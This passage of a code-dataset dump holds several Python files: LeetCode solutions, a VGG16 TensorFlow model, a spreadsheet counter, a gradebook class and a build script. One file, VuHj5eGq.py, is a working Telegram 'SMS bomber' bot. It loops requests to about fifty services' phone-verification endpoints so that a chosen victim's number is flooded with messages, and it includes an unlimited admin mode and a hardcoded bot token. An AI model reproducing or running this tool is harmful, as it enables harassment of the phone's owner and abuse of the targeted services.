self.predict_product_random(sample_size=sample_size,\n product_number=product_number,\n estimation_n=1000)\n\n # Loop through customers\n for _, row in category_prediction.iterrows():\n customer = row['customer_unique_id']\n previous_category = row['product_category_name']\n predicted_category = row['predicted_category']\n rec_customer = recommendations[customer]\n\n left_column = 35\n right_column = 15\n print(f'{\"Predictions for customer:\":<{left_column}}'\n f'{trim_id(customer):>{right_column}}')\n print(f'{\"Last purchase product category:\":<{left_column}}'\n f'{previous_category:>{right_column}}')\n print(f'{\"Predicted next product category:\":<{left_column}}'\n f'{predicted_category:>{right_column}}')\n\n if verbose:\n print(f'\\nComplete data for order:\\n{row}\\n')\n\n print(f'\\n{\" Recommended products \":#^50}')\n review_scores = rec_customer['product_scores']\n estimations = rec_customer['expected_values']\n for product, estimation in estimations.items():\n price = estimation['estimated_price']\n shipping = estimation['shipping_price']\n shipping_time = estimation['estimated_delivery_time']\n review_score 
= review_scores[product]\n print(f'{\"Product:\":<{left_column}}'f'{trim_id(product):>{right_column}}')\n print(f'{\"Price + estimated shipping cost:\":<{left_column}}'\n f'{f\"{price:.2f} + {shipping:.2f}R$\":>{right_column}}')\n print(f'{\"Estimated delivery time:\":<{left_column}}'\n f'{f\"{shipping_time} days\":>{right_column}}')\n print(f'{\"Avg. review score:\":<{left_column}}'\n f'{review_score:>{right_column}.2f}')\n \n print(f'{\"\":#^50}\\n\\n')\n\n","sub_path":"pipeline/step3_prediction.py","file_name":"step3_prediction.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"186111240","text":"class Solution(object):\n def coinChange(self, coins, amount):\n \"\"\"\n :type coins: List[int]\n :type amount: int\n :rtype: int\n \n dp, O(amount* len(coins))\n intuitive answer, the one on leetcode may have optimization\n \"\"\"\n \n # dp[i][j] := minimum value achieved \n # by using first i items(here is coins) and \n # exact j weights(here is amounts)\n dp = [float('inf')] * (amount+1)\n dp[0] = 0 # using 0 items we can achieve 0 value \n N = len(coins)\n coins.insert(0,0)\n for i in range(1, N+1):\n for j in range(coins[i], amount+1):\n # temp = float('inf') if j-coins[i] < 0 else dp[j-coins[i]] + 1\n dp[j] = min(dp[j], dp[j-coins[i]] + 1)\n \n \n # we take the last one because we need to use all \n # the weights unlike 01knapsack we don't need to use \n # all the weights\n return dp[amount] if dp[amount] != float('inf') else -1\n ","sub_path":"leetcode/dp/13_coin_change.py","file_name":"13_coin_change.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"362248320","text":"import xlrd\nimport xlwt\nimport re\nimport os\n\nclass counter:\n def __init__(self):\n PATH = ''\n files = os.listdir()\n for f in files:\n if f.endswith('.xls'):\n data = f\n break\n \n workbook = xlrd.open_workbook(data, encoding_override='utf-8')\n self.worksheet = workbook.sheet_by_index(0)\n self.find_direction()\n self.take_all_dirs()\n self.delete_elements()\n self.dirs.sort()\n self.create_direction()\n self.count()\n \n\n def find_direction(self):\n for rownum in range(0, self.worksheet.nrows):\n row_values = self.worksheet.row_values(rownum)\n for num, col in enumerate(row_values):\n if col == 'Конкурсные группы':\n self.col = rownum + 1\n self.row = num\n elif col == 'Статус заявления':\n self.row_status = num\n\n\n def take_all_dirs(self):\n dirs = []\n for rownum in range(self.col, self.worksheet.nrows):\n row_values = self.worksheet.row_values(rownum)\n if row_values[self.row_status] in ['Новое', 'Принято']:\n dirs.append(row_values[self.row])\n self.dirs = dirs\n \n def delete_elements(self):\n dirs = []\n del_elements = ['/', 'ориг.', 'бак.', 'бюдж.', 'дог.', 'факультет экономики и права',\\\n 'емф', 'техн.', 'фак.', 'пед.', 'на базе впо']\n for i in self.dirs:\n i = i.lower()\n for j in del_elements:\n i = i.replace(j, '')\n i = ' '.join(i.split())\n #i = re.sub(\"^\\s+|\\n|\\r|\\s+$\", '', i)\n #i = re.sub('\\s+', ' ', i)\n dirs.append(i)\n self.dirs = dirs\n\n def create_direction(self):\n dirs = []\n dirs1 = list(self.dirs)\n dirs1 = list(set(dirs1))\n dirs1.sort()\n for i in dirs1:\n string = i.split(' - ')\n if len(i.split(' - ')) == 2:\n dirs.append(string[1])\n elif len(i.split(' - ')) > 2:\n for i in range(1, len(string) - 1):\n tmp = string[i].split(' [')\n tmp = tmp[0]\n dirs.append(tmp)\n 
self.dirs1 = list(set(dirs))\n self.dirs1.sort()\n\n '''\n for enum, element in enumerate(self.dirs):\n for i in range(enum + 1, len(self.dirs)):\n self.dirs[i] = self.dirs[i].replace(element, '')\n for i in self.dirs:\n if i != \"\":\n dirs.append(i)\n \n for i in dirs:\n print(i)'''\n def count(self):\n counted = {}\n for i in self.dirs1:\n counted[i] = 0\n for i in self.dirs1:\n for j in self.dirs:\n if i in j:\n counted[i] += 1\n \n for i in counted.keys():\n print(i, counted[i])\n print('Total:',sum(counted.values()))\n\n\n\n\nif __name__ == \"__main__\":\n counter()\n","sub_path":"2020/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"429436865","text":"from cx_Freeze import setup, Executable\r\nimport sys\r\nimport os\r\n\r\nos.environ['TCL_LIBRARY'] = 'C:\\\\Users\\\\camer\\\\AppData\\Local\\\\Programs\\\\Python\\\\Python36\\\\tcl\\\\tcl8.6'\r\nos.environ['TK_LIBRARY'] = 'C:\\\\Users\\\\camer\\\\AppData\\Local\\\\Programs\\\\Python\\\\Python36\\\\tcl\\\\tk8.6'\r\n\r\nsys.argv.append('build_exe')\r\n\r\nbase = None\r\n\r\nexecutables = [Executable(\"scraper.py\", base=base)]\r\n\r\npackages = [\"idna\", \"praw\", \"os\", \"time\",\r\n \"sys\", \"urllib.request\", \"ctypes\", \"shutil\"]\r\n \r\noptions = {\r\n 'build_exe': {\r\n 'packages': packages,\r\n },\r\n}\r\n\r\nsetup(\r\n options=options,\r\n version=\"0.3\",\r\n description='Reddit Scraper',\r\n executables=executables\r\n)\r\n","sub_path":"Packages/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10909069","text":"class GradeBook:\n def __init__(self, student_name):\n self.student_name = student_name\n self.total_points = 0\n self.points_earned = 0\n self.grade_book_entries = {}\n\n def graded_assignment(self, assignment_name, assignment_points, assignment_earned_points):\n self.assignment_name = assignment_name\n self.assignment_points = assignment_points\n self.assignment_earned_points = assignment_earned_points\n self.assignment_grade = assignment_earned_points / assignment_points\n self.grade_book_entries.update({self.assignment_name: self.assignment_grade})\n self.total_points = self.total_points + self.assignment_points\n self.points_earned = self.points_earned + self. 
assignment_earned_points\n print(self.grade_book_entries)\n print(self.assignment_grade)\n\n def total_grade(self):\n self.grade = self.points_earned/self.total_points\n if .90 <= self.grade:\n self.letter_grade = \"A\"\n if .80 <= self.grade < .90:\n self.letter_grade = \"B\"\n if .70 <= self.grade < .80:\n self.letter_grade = \"C\"\n if .60 <= self.grade < .70:\n self.letter_grade = \"D\"\n if .60 > self.grade:\n self.letter_grade = \"F\"\n percent_grade = self.grade * 100\n print(\"\\n\" + self.student_name + \"\\n\" + \"Total grade: \" + str(('%.0f'%percent_grade)) + '%' + \"\\n\"\n + \"Letter grade: \" + self.letter_grade + \"\\n\")\n\n def look_up_grade(self, entry):\n self.entry = entry\n print(self.entry + \" : \" + str(float(self.grade_book_entries[self.entry])*100)+'%' + \"\\n\")\n","sub_path":"GradeBook.py","file_name":"GradeBook.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"638841455","text":"########################################################################################\n# Davi Frossard, 2016 #\n# VGG16 implementation in TensorFlow #\n# Details: #\n# http://www.cs.toronto.edu/~frossard/post/vgg16/ #\n# #\n# Model from https://gist.github.com/ksimonyan/211839e770f7b538e2d8#file-readme-md #\n# Weights from Caffe converted using https://github.com/ethereon/caffe-tensorflow #\n########################################################################################\n\nimport tensorflow as tf\nimport numpy as np\nfrom scipy.misc import imread, imresize\nfrom KaggleLearn.DogVsCat.imagenet_classes import class_names\n\n\nclass vgg16_getv:\n def __init__(self, imgs, weights=None, sess=None):\n self.imgs = imgs\n # self.convlayers()\n # self.fc_layers()\n f3 = self.convlayers() # fix: was vgg16_getv.convlayers(), which fails without an instance\n self.probs = tf.nn.softmax(f3)\n if weights is not None and sess is not None:\n self.load_weights_tf(weights, sess) # fix: was vgg16_getv.load_weights_tf(weights, sess)\n\n def convlayers(self):\n # zero-mean input\n with tf.variable_scope('preprocess') as scope:\n mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32, shape=[1, 1, 1, 3], name='img_mean')\n images = self.imgs - mean # fix: was the bare global name imgs\n\n # conv1_1\n with tf.variable_scope('conv1_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 3, 64], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(images, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[64], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv1_1 = tf.nn.relu(out, name=scope.name)\n\n # conv1_2\n with tf.variable_scope('conv1_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 64, 64], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv1_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[64], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv1_2 = tf.nn.relu(out, name=scope.name)\n\n # pool1\n pool1 = tf.nn.max_pool(conv1_2,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool1')\n\n # conv2_1\n with tf.variable_scope('conv2_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 64, 128], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[128], dtype=tf.float32),\n 
trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv2_1 = tf.nn.relu(out, name=scope.name)\n\n # conv2_2\n with tf.variable_scope('conv2_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 128, 128], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv2_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[128], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv2_2 = tf.nn.relu(out, name=scope.name)\n\n # pool2\n pool2 = tf.nn.max_pool(conv2_2,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool2')\n\n # conv3_1\n with tf.variable_scope('conv3_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 128, 256], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[256], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv3_1 = tf.nn.relu(out, name=scope.name)\n\n # conv3_2\n with tf.variable_scope('conv3_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 256, 256], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv3_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[256], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv3_2 = tf.nn.relu(out, name=scope.name)\n\n # conv3_3\n with tf.variable_scope('conv3_3') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 256, 256], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv3_2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[256], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv3_3 = tf.nn.relu(out, name=scope.name)\n\n # pool3\n pool3 = tf.nn.max_pool(conv3_3,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool3')\n\n # conv4_1\n with tf.variable_scope('conv4_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 256, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool3, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv4_1 = tf.nn.relu(out, name=scope.name)\n\n # conv4_2\n with tf.variable_scope('conv4_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv4_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv4_2 = tf.nn.relu(out, name=scope.name)\n\n # conv4_3\n with tf.variable_scope('conv4_3') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv4_2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv4_3 = 
tf.nn.relu(out, name=scope.name)\n\n # pool4\n pool4 = tf.nn.max_pool(conv4_3,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool4')\n\n # conv5_1\n with tf.variable_scope('conv5_1') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(pool4, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv5_1 = tf.nn.relu(out, name=scope.name)\n\n # conv5_2\n with tf.variable_scope('conv5_2') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv5_1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv5_2 = tf.nn.relu(out, name=scope.name)\n\n # conv5_3\n with tf.variable_scope('conv5_3') as scope:\n kernel = tf.get_variable(initializer=tf.truncated_normal([3, 3, 512, 512], dtype=tf.float32,\n stddev=1e-1), name='weights')\n conv = tf.nn.conv2d(conv5_2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.get_variable(initializer=tf.constant(0.0, shape=[512], dtype=tf.float32),\n trainable=True, name='biases')\n out = tf.nn.bias_add(conv, biases)\n conv5_3 = tf.nn.relu(out, name=scope.name)\n\n # pool5\n pool5 = tf.nn.max_pool(conv5_3,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME',\n name='pool5')\n\n\n with tf.variable_scope('fc6'):\n shape = int(np.prod(pool5.get_shape()[1:]))\n fc1w = tf.get_variable(initializer=tf.truncated_normal([shape, 4096],\n dtype=tf.float32,\n stddev=1e-1), name='weights')\n fc1b = tf.get_variable(initializer=tf.constant(1.0, shape=[4096], dtype=tf.float32),\n trainable=True, name='biases')\n pool5_flat = tf.reshape(pool5, [-1, shape])\n fc1l = tf.nn.bias_add(tf.matmul(pool5_flat, fc1w), fc1b)\n fc1 = tf.nn.relu(fc1l)\n\n with tf.variable_scope('fc7'):\n fc2w = tf.get_variable(initializer=tf.truncated_normal([4096, 4096],\n dtype=tf.float32,\n stddev=1e-1), name='weights')\n fc2b = tf.get_variable(initializer=tf.constant(1.0, shape=[4096], dtype=tf.float32),\n trainable=True, name='biases')\n fc2l = tf.nn.bias_add(tf.matmul(fc1, fc2w), fc2b)\n fc2 = tf.nn.relu(fc2l)\n\n with tf.variable_scope('fc8'):\n fc3w = tf.get_variable(initializer=tf.truncated_normal([4096, 1000],\n dtype=tf.float32,\n stddev=1e-1), name='weights')\n fc3b = tf.get_variable(initializer=tf.constant(1.0, shape=[1000], dtype=tf.float32),\n trainable=True, name='biases')\n fc3l = tf.nn.bias_add(tf.matmul(fc2, fc3w), fc3b)\n\n return fc3l\n\n def load_weights_tf(self, weight_file, sess):\n weights = np.load(weight_file)\n keys = sorted(weights.keys())\n print(\"keys\", keys)\n for key in keys:\n x = str(key[:-2])\n with tf.variable_scope(key[:-2], reuse=True):\n if key[-1:] == \"W\": # fix: was 'is \"W\"'; identity checks against a sliced string are unreliable\n subkey = \"weights\"\n else:\n subkey = \"biases\"\n xxx = weights[key]\n print(\"k,np.shape\", key, np.shape(weights[key]))\n sess.run(tf.get_variable(subkey).assign(weights[key]))\n\n def load_weights_npy_tf(self, weight_file, sess):\n weights = np.load(weight_file, encoding='latin1').item()\n keys = sorted(weights.keys())\n print(\"keys\", keys)\n for i, k in enumerate(keys):\n for subkey in (0, 1):\n # xxx1 = weights[k][subkey]\n # xxx2 = weights[k][subkey]\n # 
print(\"xxx1.shape\", xxx1.shape)\n # print(\"xxx2.shape\", xxx2.shape)\n # print(\"i,k,subkey,np.shape\", j, k, subkey, np.shape(weights[k][subkey]))\n # sess.run(parameters[j].assign(weights[k][subkey]))\n sess.run(tf.get_variable(subkey).assign(weights[subkey]))\n # sess.run(parameters[j].assign(weights[k][subkey]))\n # j += 1\n\n\nif __name__ == '__main__':\n sess = tf.Session()\n imgs = tf.placeholder(tf.float32, [None, 224, 224, 3])\n vgg = vgg16_getv(imgs, './VGG16/vgg16_weights.npz', sess)\n # vgg = vgg16(imgs, './VGG16/vgg16.npy', sess)\n\n img1 = imread('./test_data/tiger.jpeg', mode='RGB')\n img1 = imresize(img1, (224, 224))\n\n prob = sess.run(vgg.probs, feed_dict={vgg.imgs: [img1]})[0]\n preds = (np.argsort(prob)[::-1])[0:5]\n for p in preds:\n print(class_names[p], prob[p])\n# down load websiet: https://www.cs.toronto.edu/~frossard/\n","sub_path":"KaggleLearn/DogVsCat/vgg16_getv.py","file_name":"vgg16_getv.py","file_ext":"py","file_size_in_byte":14665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"571947368","text":"import requests\nimport threading\nfrom datetime import datetime, timedelta\nfrom telebot import TeleBot\nimport telebot\nimport time\n\nTOKEN = '1057849061:AAG0idc99-x3xGa6wzOevqKqSaMSZ5VMhqw'\n\nTHREADS_LIMIT = 10000\n\nchat_ids_file = 'chat_ids.txt'\n\nADMIN_CHAT_ID = '344883715'\n\nusers_amount = [0]\nthreads = list()\nTHREADS_AMOUNT = [0]\ntypes = telebot.types\nbot = TeleBot(TOKEN)\nrunning_spams_per_chat_id = []\n\n\ndef save_chat_id(chat_id: object) -> object:\n chat_id = str(chat_id)\n with open(chat_ids_file, \"a+\") as ids_file:\n ids_file.seek(0)\n\n ids_list = [line.split('\\n')[0] for line in ids_file]\n\n if chat_id not in ids_list:\n ids_file.write(f'{chat_id}\\n')\n ids_list.append(chat_id)\n print(f'New chat_id saved: {chat_id}')\n else:\n print(f'chat_id {chat_id} is already saved')\n users_amount[0] = len(ids_list)\n return\n\n\ndef send_message_users(message):\n def send_message(chat_id):\n data = {\n 'chat_id': chat_id,\n 'text': message\n }\n response = requests.post(f'https://api.telegram.org/bot{TOKEN}/sendMessage', data=data)\n\n with open(chat_ids_file, \"r\") as ids_file:\n ids_list = [line.split('\\n')[0] for line in ids_file]\n\n [send_message(chat_id) for chat_id in ids_list]\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n keyboard = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\n boom = types.KeyboardButton(text='Start')\n stop = types.KeyboardButton(text='Stop')\n info = types.KeyboardButton(text='Info')\n\n buttons_to_add = [boom, stop, info]\n\n if int(message.chat.id) == ADMIN_CHAT_ID:\n buttons_to_add.append(types.KeyboardButton(text='Рассылка'))\n\n keyboard.add(*buttons_to_add)\n bot.send_message(message.chat.id, 'Привет, начнём?!', reply_markup=keyboard)\n save_chat_id(message.chat.id)\n\n\ndef start_spam(chat_id, phone_number, force):\n running_spams_per_chat_id.append(chat_id)\n\n if force:\n msg = f'Спам запущен на неограниченое время для номера +{phone_number}!'\n else:\n msg = f'Спам запущен на 5 минут на номер + {phone_number}!'\n\n bot.send_message(chat_id, msg)\n end = datetime.now() + timedelta(minutes=5)\n while (datetime.now() < end) or (force and chat_id == ADMIN_CHAT_ID):\n if chat_id not in running_spams_per_chat_id:\n break\n send_for_number(phone_number)\n bot.send_message(chat_id, f'Спам на номер {phone_number} завершён')\n THREADS_AMOUNT[0] -= 3\n try:\n running_spams_per_chat_id.remove(chat_id)\n except 
Exception:\n pass\n\n\ndef send_for_number(phone):\n request_timeout = 0.00001\n while True:\n requests.get('https://findclone.ru/register?phone=+' + phone, params={'phone': '+' + phone})\n requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': phone}, headers={})\n requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': phone})\n requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': phone})\n requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc': '2.0', 'protocol': '5', 'method': 'Пользователь.ЗаявкаНаФизика', 'params': {'phone': phone}, 'id': '1'})\n requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone})\n requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + phone})\n requests.post('https://mcdonalds.ru/api/auth/code', json={'phone': '+' + phone})\n requests.post('https://www.citilink.ru/registration/confirm/phone/+' + phone + '/')\n requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone})\n requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone})\n requests.post('https://www.rabota.ru/remind', data={'credential': phone})\n requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}, headers={})\n requests.post('https://belkacar.ru/get-confirmation-code', data={'phone': phone}, headers={})\n requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber': phone, 'countryCode': 'ID', 'name': 'test', 'email': 'mail@mail.com', 'deviceToken': '*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'})\n requests.post('https://aitu.io/kz.btsd.messenger.auth.AuthService/SendCode', data={'phone': phone})\n requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': phone})\n requests.post('https://app.benzuber.ru/login', data={'phone': '+' + phone})\n requests.post('https://city24.ua/personalaccount/account/registration', data={'phone': phone})\n requests.post('https://dostavista.ru/backend/send-verification-sms', data={'phone': phone})\n requests.post('https://www.finam.ru/api/smslocker/sendcode', data={'phone': phone})\n requests.post('https://findclone.ru/register', data={'phone': '+' + phone})\n requests.post('https://helsi.me/api/healthy/accounts/login', data={'phone': phone})\n requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', data={'phone': phone})\n requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', data={'phone': phone})\n requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': phone})\n requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', data={'phone': phone})\n requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', data={'phone': phone})\n requests.post('https://www.monobank.com.ua/api/mobapplink/send', data={'phone': '+' + phone})\n requests.post('https://auth.multiplex.ua/login', data={'phone': phone})\n requests.post('https://account.my.games/signup_send_sms/', data={'phone': '+' + phone})\n requests.post('https://www.ozon.ru/api/composer-api.bx/_action/fastEntry', data={'phone': phone})\n requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone})\n 
requests.post('https://pass.rutube.ru/api/accounts/phone/send-password/', json={'phone': phone})\n requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': phone})\n requests.post('https://app.sberfood.ru/api/mobile/v3/auth/sendSms', json={'phone': '+' + phone}, headers={\"AppKey\": \"WebApp-3a2605b0cf2a4c9d938752a84b7e97b6\"})\n requests.post('https://shopandshow.ru/sms/password-request/',data={\"phone\": \"+\" + phone, \"resend\": 0})\n requests.post('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper', params={\"oper\": 9, \"callmode\": 1, \"phone\": \"+\" + phone})\n requests.post('https://smart.space/api/users/request_confirmation_code/', json={\"mobile\": \"+\" + phone, \"action\": \"confirm_mobile\"})\n requests.post('https://api.sunlight.net/v3/customers/authorization/', data={\"phone\": phone})\n requests.post('https://msk.tele2.ru/api/validation/number/\" + phone', json={\"sender\": \"Tele2\"})\n requests.post('https://api.tinkoff.ru/v1/sign_up', data={\"phone\": \"+\" + phone})\n requests.post('https://pay.visa.ru/api/Auth/code/request', json={\"phoneNumber\": \"+\" + phone})\n requests.post('https://shop.vsk.ru/ajax/auth/postSms/', data={\"phone\": phone})\n requests.post('https://api.iconjob.co/api/auth/verification_code', json={\"phone\": phone})\n requests.post('https://api.wowworks.ru/v2/site/send-code', json={\"phone\": phone, \"type\": 2})\n requests.post('https://api.chef.yandex/api/v2/auth/sms', json={\"phone\": phone})\n requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={\"phone_number\": \"+\" + phone})\n requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={\"phone\": \"+\" + phone})\n requests.post('https://api.kinoland.com.ua/api/v1/service/send-sms', headers={\"Agent\": \"website\"},json={\"Phone\": phone, \"Type\": 1})\n requests.post('https://guru.taxi/api/v1/driver/session/verify', json={\"phone\": {\"code\": 1, \"number\": phone}})\n\ndef spam_handler(phone, chat_id, force):\n if int(chat_id) in running_spams_per_chat_id:\n bot.send_message(chat_id, '!Вы уже начали рассылку спама.')\n return\n\n if THREADS_AMOUNT[0] < THREADS_LIMIT:\n x = threading.Thread(target=start_spam, args=(chat_id, phone, force))\n threads.append(x)\n THREADS_AMOUNT[0] += 1\n x.start()\n else:\n bot.send_message(chat_id, '!Сервера сейчас перегружены. Попытайтесь снова через несколько минут!')\n print('Максимальное количество тредов исполняется. 
Действие отменено.!')\n\n\n@bot.message_handler(content_types=['text'])\ndef handle_message_received(message):\n chat_id = int(message.chat.id)\n text = message.text\n\n if text == 'Start':\n bot.send_message(chat_id, 'Введите номер без + в формате:\\n🇷🇺 79xxxxxxxxx')\n\n elif text == 'Рассылка' and chat_id == ADMIN_CHAT_ID:\n bot.send_message(chat_id, 'Введите сообщение в формате: \"отправка: ваш_текст\" без кавычек')\n elif text == 'Info':\n bot.send_message(chat_id, 'По всем вопросам можете писать мне в лс:\\n @ogpr1nce')\n\n elif text == 'Stop':\n if chat_id not in running_spams_per_chat_id:\n bot.send_message(chat_id, 'Вы еще не начинали атаку')\n else:\n running_spams_per_chat_id.remove(chat_id)\n\n elif 'отправка: ' in text and chat_id == ADMIN_CHAT_ID:\n msg = text.replace(\"отправка: \", \"\")\n send_message_users(msg)\n\n elif len(text) == 11:\n phone = text\n spam_handler(phone, chat_id, force=False)\n\n elif len(text) == 12:\n phone = text\n spam_handler(phone, chat_id, force=False)\n\n elif len(text) == 12 and chat_id == ADMIN_CHAT_ID and text[0] == '_':\n phone = text[1:]\n spam_handler(phone, chat_id, force=True)\n\n else:\n bot.send_message(chat_id, f'Номер введен неправильно. Введено {len(text)} символов, ожидается 11')\n print(f'Номер введен неправильно. Введено {len(text)} символов, ожидается 11')\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"VuHj5eGq.py","file_name":"VuHj5eGq.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"132422350","text":"class Solution(object):\n def subsets(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n if not nums: return [[]]\n res_subsets = self.subsets(nums[1:])\n return res_subsets + [[nums[0]] + i for i in res_subsets]\n\n def subsetsWithDup(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n sets = self.subsets(nums)\n sets = [sorted(i) for i in sets]\n ans = []\n for i in sets:\n if i not in ans:\n ans.append(i)\n return ans\n","sub_path":"code/90. Subsets II.py","file_name":"90. Subsets II.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"232148917","text":"from difflib import get_close_matches\nimport typing as T\nimport random\nfrom snowfakery.plugins import PluginContext\nfrom itertools import product\nfrom datetime 